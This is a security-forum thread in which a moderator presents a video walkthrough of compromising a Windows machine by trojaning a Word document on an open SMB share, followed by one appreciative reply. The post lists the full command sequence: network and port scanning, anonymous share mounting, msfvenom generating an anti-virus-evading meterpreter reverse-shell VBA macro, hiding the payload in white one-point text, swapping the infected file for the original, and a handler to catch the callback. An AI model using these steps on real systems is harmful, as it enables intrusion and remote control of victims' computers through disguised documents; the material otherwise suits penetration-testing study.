Results 1 to 2 of 2

Thread: [Video] Metasploit Vs Microsoft Office

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Metasploit Vs Microsoft Office

    Links
    Watch video on-line: http://blip.tv/g0tmi1k/metasploit-vs...office-5241818
    Download video:
    http://www.mediafire.com/?qr6c0h9gva90mvv
    Brief Overview
    Following on from the Adobe Reader post, another very common document format is Microsoft's Office Word (.doc). This screencast demonstrates how embedding an evil 'macro' into the document can lead to compromising the target's computer.

    A macro is an 'automated shortcut' to repeat tasks, in this case, to generate a meterpreter payload and connect back to the attacker. Even though the payload can be encoded to by-pass anti-virus, Microsoft Word still could block it depending on the macro security level.

    To infect the target, the attacker scans the network and finds an open shared folder, which they have read & write access to. Upon viewing the contents of the folder, the attacker notices a Word Document. However, presenting the infected file could be done a number of different ways, such as emailing the target instead of scanning & replacing.


    What do I need?
    * Metasploit – Download here. *Can be found on BackTrack 5.*
    * Microsoft Office - Can be bought from the online office store
    * Nmap - Download here. *Can be found on BackTrack 5.*
    * Samba - Download here. *Can be found on BackTrack 5.*
    * The attacker remotely controlled a 'test machine' using tightvnc which can be found on BackTrack 5. Download here.


    Method
    * Scan network for active hosts (nmap)
    * Scan host for open ports (nmap)
    * Scan for any available shares (Samba)
    * Mount shared folder & view contents of it (Samba)
    * Copy document onto another (Windows) machine. (Samba)
    * Create macro & embed the payload (Metasploit)
    * Try & hide the 'modifications' (Office)
    * Replace the original document with the infected version (Samba)
    * Wait for target to open the file
    * Game Over


    Commands:
    Code:
    apt-get install smbfs 
    nmap 192.168.0.* -n -sn
    nmap 192.168.0.105 -T5
    smbclient -L \\192.168.0.105 -N
    mkdir /mnt/shared
    smbmount //192.168.0.105/Documents /mnt/shared -o rw
    cd /mnt/shared && ls -l
    
    mkdir ../vnc
    smbmount //192.168.0.105/write /mnt/vnc -o rw
    cp SuperSecretStuff.doc ../vnc/
    
    ifconfig eth0   #hostname -I
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=445 -e shikata_ga_nai -i 3 -f vba > ../vnc/vba.txt
    
    vncviewer 192.168.0.124
    Notepad -> Open -> vba.txt
    Microsoft Word -> Tools -> Macro -> Virtual Basic Editor
       Insert -> Module -> *Paste first half* -> Close
    Microsoft Word -> Page break -> *Paste second half* -> Font Size: 1 -> Font Colour: White -> Save -> Close
    
    cp ../vnc/SuperSecretStuff.doc ./
    clear
    
    msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=445 E
    Walk-through
    As the target has 'learnt their lesson' from 'new' opening email attachments from 'unknown' people, the attacker chooses to replace a 'trusted' file.

    The attacker has already connected to the network and to starts to scan the network to see if there are any active hosts currently connected. After locating the target, the attacker scans the target to see which ports they have that are open. The results of the port scan shows that the target could be sharing a folder on the network. The attacker proceeds by searching for shared resources. The attacker attempts to access a shared folder as a guest, and when prompted for any credentials, leaves them blank. The attacker gets lucky and has access to an open & writeable folder! After listing the contents of the folder, notices it has a document in it...

    Before the attacker clones the document, they mount a shared folder on a 'test machine' which they control. The reason for this is because the easiest way to inject a VBA macro is to use 'Microsoft Office' itself! The attacker then copies the targets document to the test machine.

    Afterwards, the attacker generates the VBA macro, which will be injected into the cloned documents. When creating the macro, the attacker chooses to 'encode' the payload, which 'helps' bypass anti-virus - however this isn't essential as there isn't any installed!

    Once the macro has been transferred to the test machine, the attacker remotely connects to the machine to control it. The first stage of the infected is to create a macro and place the first piece of the code which was generated into it. The second piece of code goes into the document itself. As having the code is very visible, the attacker decides to use the smallest font, therefore taking up the least amount of space. By setting the text colour to white, this is the same as the background colour that causes the text to appear to be invisible. The document is then saved and replaced over the original.

    The attacker then sits back & relaxes until the target opens the 'new infected' document... which the target soon does =). However! Depending on Microsoft's Word security level, either the user is presented with a warning message asking to enable or disable macros, doesn't open the document at all or opens without question! *As shown in the video*.


    Notes:
    * This is my first video using BackTrack 5, by default KDE has semi-transparent konsole window. This caused 'poor' results when encoding.
    * Camtasia didn't record the VNC session that well, hence why there was a bit of lag in places.
    * Blip.TV has recently had a makeover and has updated their internal system for encoding. I believe the videos are now encoded at a lower quality, compared to previously uploaded.
    * In the current release of metasploit, I created a link to 'msfvenom' before recording by doing: ln -s /opt/framework3/msf3/msfvenom /usr/local/bin/msfvenom. Hopefully this will be fix/updated soon.
    * Before hand, I had instlaled smbfs. This is missing from the video, however you just need to run, apt-get install smbfs

    Song: Lazee Feat. Neverstore - Hold On (Matrix Futurebound Terrace Tantrum Remix)
    Video length: 5:39
    Capture length: 10:04
    Blog Post: g0tmi1k: [Video] Metasploit Vs Microsoft Office
    Forum Post: http://www.backtrack-linux.org/forum...tml#post204397






    ~g0tmi1k
    Have you...g0tmi1k?

  2. #2
    Good friend of the forums zimmaro's Avatar
    Join Date
    Mar 2010
    Location
    milano
    Posts
    407

    Default Re: [Video] Metasploit Vs Microsoft Office

    this is the only original video!!!
    There are around of bad imitations! muahahah!
    thank you very much for your works! && ... welcome back!!!!!
    my most sincere esteem! (zimmaro)

Similar Threads

  1. Replies: 17
    Last Post: 04-07-2011, 10:00 PM
  2. Microsoft Office 2007 on BackTrack 3 or 4
    By d.rodriguez in forum BackTrack Howtos
    Replies: 15
    Last Post: 01-21-2010, 07:54 PM
  3. Metasploit latest video
    By imported_mzer0 in forum OLD Pentesting
    Replies: 5
    Last Post: 09-14-2009, 09:43 PM
  4. Microsoft Office and Microsoft Visual Basic = Low-tech hack
    By imported_BaconZombie in forum OLD General IT Discussion
    Replies: 9
    Last Post: 01-31-2008, 07:50 PM
  5. Office icon in taskbar (Open Office) - how to create?
    By -Bewa- in forum OLD Newbie Area
    Replies: 1
    Last Post: 04-04-2007, 07:44 PM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •